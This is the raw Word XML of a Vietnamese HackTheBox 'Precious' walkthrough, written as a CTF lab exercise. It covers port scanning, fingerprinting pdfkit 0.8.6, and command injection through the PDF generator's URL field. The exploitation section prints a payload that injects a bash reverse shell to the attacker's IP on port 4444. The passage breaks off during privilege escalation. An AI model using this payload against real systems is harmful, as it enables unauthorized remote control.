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34EA8" w14:textId="7C3BD58F" w:rsidR="00704C17" w:rsidRDefault="00B0192B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="643746CD" wp14:editId="5833D8C6">
            <wp:extent cx="5943600" cy="572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72770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CBD79" w14:textId="076F6CC6" w:rsidR="00B0192B" w:rsidRDefault="00B0192B">
      <w:r>
        <w:t xml:space="preserve">Chào các bạn, hn mk xin đc </w:t>
      </w:r>
      <w:r w:rsidR="00721A77">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>chuyển hộ khẩu</w:t>
      </w:r>
      <w:r w:rsidR="00721A77">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sang bên Hackthebox để làm 1 bài mới ra mắt có tên là Precious. Bắt đầu thôi nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78C790" w14:textId="552C374B" w:rsidR="00B0192B" w:rsidRDefault="00B0192B" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dò quét</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C522B1D" w14:textId="73AF3838" w:rsidR="00B0192B" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004C4705">
        <w:t>rustscan -b 500 -a precious.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CA459" w14:textId="0E75BB89" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25875B43" wp14:editId="321C9B11">
            <wp:extent cx="2606040" cy="2798887"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2614932" cy="2808437"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A840DF" w14:textId="32CD9D81" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15202652" w14:textId="61AC7DE1" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004C4705">
        <w:t>nmap -p 22,80 -sC -sV -v -T4 precious.htb -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31661C85" w14:textId="4E393B63" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="518B3615" wp14:editId="3C70CB6F">
            <wp:extent cx="5943600" cy="240347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2403475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A82B8C" w14:textId="429B4086" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59072407" w14:textId="4618E626" w:rsidR="004C4705" w:rsidRDefault="004C4705" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Có 2 cổng đang đc mở mà chúng ta rất quen thuộc là 80 và 22</w:t>
      </w:r>
      <w:r w:rsidR="00E951B1">
        <w:t xml:space="preserve"> tương ứng là dịch vụ web và ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444225C8" w14:textId="38B04BAA" w:rsidR="00E951B1" w:rsidRDefault="00E951B1" w:rsidP="00B0192B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5382B6" w14:textId="7A456C98" w:rsidR="00E951B1" w:rsidRDefault="00E951B1" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5463F14A" w14:textId="1E81DBC9" w:rsidR="00E951B1" w:rsidRDefault="00D37242" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Từ kết quả dò quét với Nmap ở trên chúng ta thấy đc Web Server là Nginx. “Phusion Passenger” sau khi mk research thì </w:t>
      </w:r>
      <w:r w:rsidR="00B7361E">
        <w:t xml:space="preserve">biết được nó là 1 web application server cho ngôn ngữ ruby. =&gt; khả năng cao target sử dụng ngôn ngữ lập trình Ruby. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D979B2" w14:textId="41F70CD2" w:rsidR="00B7361E" w:rsidRDefault="00B7361E" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Với phiên bản Phusion Passenger 6.0.15 khi tra cứu thì ko thấy có xuất hiện lỗi ở version này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB3B6D2" w14:textId="28C57D8B" w:rsidR="00B7361E" w:rsidRDefault="00573868" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Đến đây chúng ta hãy qua xem website có gì hay ho ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E05E1" w14:textId="197BBDD6" w:rsidR="00573868" w:rsidRDefault="00573868" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D45F1CD" wp14:editId="4603ECB9">
            <wp:extent cx="5120640" cy="236774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3009" cy="2373468"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E7C4E" w14:textId="016393B5" w:rsidR="00573868" w:rsidRDefault="00573868" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64263249" w14:textId="07F02AE8" w:rsidR="00573868" w:rsidRDefault="00573868" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>“Convert web page to PDF” =&gt; liên quan đến</w:t>
      </w:r>
      <w:r w:rsidR="008F09AB">
        <w:t xml:space="preserve"> việc chuyển đổi nội dụng các thẻ html sang 1 file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pdf</w:t>
      </w:r>
      <w:r w:rsidR="008F09AB">
        <w:t xml:space="preserve"> như thế này, mk liên tưởng ngay đến những bài ngày trc mk từng làm: Hack the gemini inc (vulnhub) hoặc Sea surfer (tryhackme)</w:t>
      </w:r>
      <w:r w:rsidR="00E454E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA1C0E">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E454E2">
        <w:t>các bạn có thể tham khảo thêm</w:t>
      </w:r>
      <w:r w:rsidR="008F09AB">
        <w:t>. Trong trường hợp đó</w:t>
      </w:r>
      <w:r w:rsidR="00A0111A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F09AB">
        <w:t xml:space="preserve"> target tích hợp thêm software của bên thứ 3 và phiên bản software đó bị dính lỗi. </w:t>
      </w:r>
      <w:r w:rsidR="00721CD3">
        <w:t>Để xác minh target sử dụng software nào thì chúng ta chỉ cần download file pdf đc generate và check metadata của nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0808A597" w14:textId="4D2033B7" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="294F0FDD" wp14:editId="06AA44DB">
            <wp:extent cx="5943600" cy="1072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72515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CC91F" w14:textId="536C9BB4" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089E2262" w14:textId="60F198C1" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5728AC70" wp14:editId="57D6A7D6">
            <wp:extent cx="5943600" cy="885190"/>
            <wp:effectExtent l="0" t="0" r="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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="885190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E000D" w14:textId="0FD4C7B2" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FDAA63" w14:textId="798A23B7" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nhấn submit rồi tải file pdf về</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438913B9" w14:textId="1F9D3E6A" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290BD3C5" wp14:editId="3109CD9B">
            <wp:extent cx="5943600" cy="920115"/>
            <wp:effectExtent l="0" t="0" r="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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="920115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E702DBD" w14:textId="6097A591" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B799E5" w14:textId="47C7F1AD" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nhìn log trên web server của chúng ta thì thấy rằng target đã kết nối đến để đọc nd file test.html của chúng ta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F49B8" w14:textId="5147E359" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DDD075B" wp14:editId="149CBE44">
            <wp:extent cx="3832860" cy="1725606"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3846314" cy="1731663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9A79F" w14:textId="17D053E2" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2EC5C4" w14:textId="089C9393" w:rsidR="00721CD3" w:rsidRDefault="00721CD3" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00721CD3">
        <w:t>cvfzijc0nl23zdl5dyj7bpst7q0yngyp.pdf</w:t>
      </w:r>
      <w:r>
        <w:t>” là file vừa tải về. Thấy rằng creator là pdfkit version 0.8.6</w:t>
      </w:r>
      <w:r w:rsidR="00D035E2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D629F8" w14:textId="121DE419" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDF5D8D" wp14:editId="165CC098">
            <wp:extent cx="3421915" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3440284" cy="1371302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC44237" w14:textId="472CF51F" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C4887F" w14:textId="706F3B61" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lỗi nghiêm trọng đây, cho phép thực thi câu lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7645E63B" w14:textId="65CB2607" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00E951B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E81167" wp14:editId="1EEF84EC">
            <wp:extent cx="5128260" cy="3936049"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5144575" cy="3948571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EC1A5" w14:textId="7064B8F3" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0ADCC" w14:textId="77777777" w:rsidR="00DD2275" w:rsidRDefault="00D035E2" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Đọc PoC ở trên</w:t>
      </w:r>
      <w:r w:rsidR="00DD2275">
        <w:t xml:space="preserve"> mk “sắm” luôn 1 đoạn code để inject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF2B487" w14:textId="2569C8A5" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A80AF31" wp14:editId="50FE6EF7">
            <wp:extent cx="5943600" cy="164465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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1644650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66431E42" w14:textId="37ECAC49" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9A2BFD" w14:textId="4E616964" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00DD2275">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD2275">
        <w:t>http://10.10.14.16/?name=%20`bash -c "bash -i &gt;&amp; /dev/tcp/10.10.14.16/4444 0&gt;&amp;1"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555CAEDA" w14:textId="4BF3D0F2" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D410479" wp14:editId="6DB85B68">
            <wp:extent cx="5943600" cy="1258570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 12"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 website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1258570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3BE3C" w14:textId="1BC5FA56" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1521765C" w14:textId="4AC6A9EA" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi nhấn submit thì đc kết quả như mong đợi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5E7A0" w14:textId="6ED0FC8F" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E3821B4" wp14:editId="31FA6A69">
            <wp:extent cx="5943600" cy="782955"/>
            <wp:effectExtent l="0" t="0" r="0" b="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17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="782955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275DF8D" w14:textId="5F0E09C0" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3898E94F" w14:textId="4F9E43B3" w:rsidR="00DD2275" w:rsidRDefault="00924D09" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Leo thang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05980166" w14:textId="5B44D406" w:rsidR="00924D09" w:rsidRDefault="005A7464" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4633BA38" wp14:editId="036F2E03">
            <wp:extent cx="4251960" cy="1357009"/>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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4267950" cy="1362112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86C716" w14:textId="1F90A030" w:rsidR="005A7464" w:rsidRDefault="005A7464" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5E1B65" w14:textId="4D243732" w:rsidR="005A7464" w:rsidRDefault="001079FD" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>User hiện tại là “ruby” và còn thêm 1 user nữa là henry (ko tính user root).</w:t>
      </w:r>
      <w:r w:rsidR="00487B02">
        <w:t xml:space="preserve"> Sau 1 hồi lục lọi từ SUID, </w:t>
      </w:r>
      <w:r w:rsidR="005C6F5B" w:rsidRPr="005C6F5B">
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidR="005C6F5B">
        <w:t>, cronjob, sudo permission, kernel, process, env,….. check các thư mục /, /var, /opt, /home,…. nhưng ko đc khả quan lắm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765120B" w14:textId="1D86B666" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau 1 lúc thư giãn, mk quay trở lại và lục tung các thư mục một lần nữa. Và bất ngờ tìm được creds của henry. Vị trí file chứa creds mk cũng ít nghĩ tới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59967878" w14:textId="7C9875E5" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FEFDE61" w14:textId="303329BF" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D55DA1" w14:textId="5575A9C7" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFF0B4A" w14:textId="1213B031" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D39533" wp14:editId="00427F20">
            <wp:extent cx="2697480" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="762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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2700957" cy="3586016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AF8CF" w14:textId="7507D719" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
